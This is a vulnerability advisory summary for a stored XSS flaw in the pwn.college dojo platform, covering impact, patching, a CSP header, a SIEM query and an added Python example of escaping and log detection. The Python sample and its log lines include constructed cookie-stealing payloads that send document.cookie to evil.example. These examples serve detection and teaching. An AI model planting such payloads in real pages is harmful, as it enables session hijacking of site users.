CVE-2025-24885
📋 TL;DR
This vulnerability allows unprivileged users to plant stored cross-site scripting (XSS) payloads on the pwn.college education platform by exploiting missing access controls in the rendering of custom dojo pages. Any authenticated user of the platform can inject script that executes in other users' browsers when they view an affected page. Platform administrators and all users are exposed to potential data theft or session hijacking.
💻 Affected Systems
- pwn.college dojo platform
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, hijack user accounts, perform actions as authenticated users, deface the platform, or redirect users to malicious sites, potentially compromising the entire user base.
Likely Case
Malicious users create XSS payloads in custom pages that steal session tokens from other users, leading to account compromise and unauthorized access to educational content.
If Mitigated
With proper input validation and context-appropriate output encoding, XSS payloads would be rendered harmlessly as visible text rather than as executable code.
🎯 Exploit Status
Exploitation requires user authentication but minimal privileges. Attackers need to understand XSS payload creation and the platform's page rendering mechanism.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Latest version with the security fix
Vendor Advisory: https://github.com/pwncollege/dojo/security/advisories/GHSA-8m79-rmhw-rg84
Restart Required: No
Instructions:
1. Update to the latest version of the pwn.college dojo platform.
2. Ensure all custom page rendering functions implement proper access controls.
3. Verify that user input is properly sanitized and output is encoded.
🔧 Temporary Workarounds
Disable custom page creation
Temporarily disable the ability for users to create custom dojo pages until patching is complete.
Implement Content Security Policy
Deploy a strict Content Security Policy header to mitigate XSS impact by restricting script execution sources.
Content-Security-Policy: default-src 'self'; script-src 'self'
🧯 If You Can't Patch
- Implement web application firewall rules to block XSS payload patterns in user-generated content
- Enable strict input validation and output encoding for all user-controlled data rendered in pages
🔍 How to Verify
Check if Vulnerable:
Test if unprivileged users can create custom pages with script tags that execute when viewed by other users.
Check Version:
Check the platform version against the patched version mentioned in the advisory.
Verify Fix Applied:
Attempt to inject XSS payloads in custom pages and verify they are properly sanitized and don't execute.
📡 Detection & Monitoring
Log Indicators:
- Unusual custom page creation patterns
- Multiple failed XSS attempts in logs
- User reports of unexpected page behavior
Network Indicators:
- Suspicious script tags in HTTP requests
- Unexpected external resource loading from user pages
SIEM Query:
search 'POST /create_page' AND (contains(body, '<script>') OR contains(body, 'javascript:'))
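An added Python example (not code from the dojo project or from the advisory) that illustrates two points above: the "If Mitigated" contrast between rendering custom page content raw and rendering it HTML-encoded, and the SIEM query in Detection & Monitoring applied to constructed log lines. The log format, the /create_page path and the sample payloads are assumptions made for the illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample of user-supplied custom page content (not from the advisory).
USER_CONTENT = 'Welcome! <script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Matches script tags and javascript: URLs inside any remaining HTML tag.
ACTIVE_MARKUP = re.compile(r"<script\b|<[^>]+javascript:", re.IGNORECASE)


def render_unescaped(content: str) -> str:
    """Vulnerable pattern: user content is concatenated into the page as raw HTML."""
    return f"<div class='dojo-page'>{content}</div>"


def render_escaped(content: str) -> str:
    """Mitigated pattern: HTML-encode user content so markup is displayed as text.
    quote=True also encodes quotes, which matters if the value lands in an attribute."""
    return f"<div class='dojo-page'>{html.escape(content, quote=True)}</div>"


def contains_active_markup(rendered: str) -> bool:
    """True if the rendered page still carries executable script markup."""
    return ACTIVE_MARKUP.search(rendered) is not None


# Constructed access-log lines: "<method> <path> <status> body=\"<url-encoded body>\"".
SAMPLE_LOGS = [
    'POST /create_page 200 body="title=Intro&content=%3Cp%3EHello%3C%2Fp%3E"',
    'POST /create_page 200 body="title=x&content=%3Cscript%3Elocation%3D%27https%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"',
    'GET /dojo/intro 200 body=""',
    'POST /create_page 200 body="content=%3Ca+href%3D%22javascript%3Aalert(1)%22%3Eclick%3C%2Fa%3E"',
]

LOG_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) (?P<status>\d+) body="(?P<body>.*)"$')
PAYLOAD_RE = re.compile(r"<script\b|javascript:", re.IGNORECASE)


def flag_xss_submissions(lines):
    """Return the log lines the SIEM query would flag: POSTs to /create_page whose
    URL-decoded body contains <script> or a javascript: URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != "/create_page":
            continue
        if PAYLOAD_RE.search(unquote_plus(m["body"])):  # decode first, or %3Cscript%3E is missed
            hits.append(line)
    return hits
```

Decoding the body before matching is the part a literal `contains(body, '<script>')` query misses when the form data is URL-encoded.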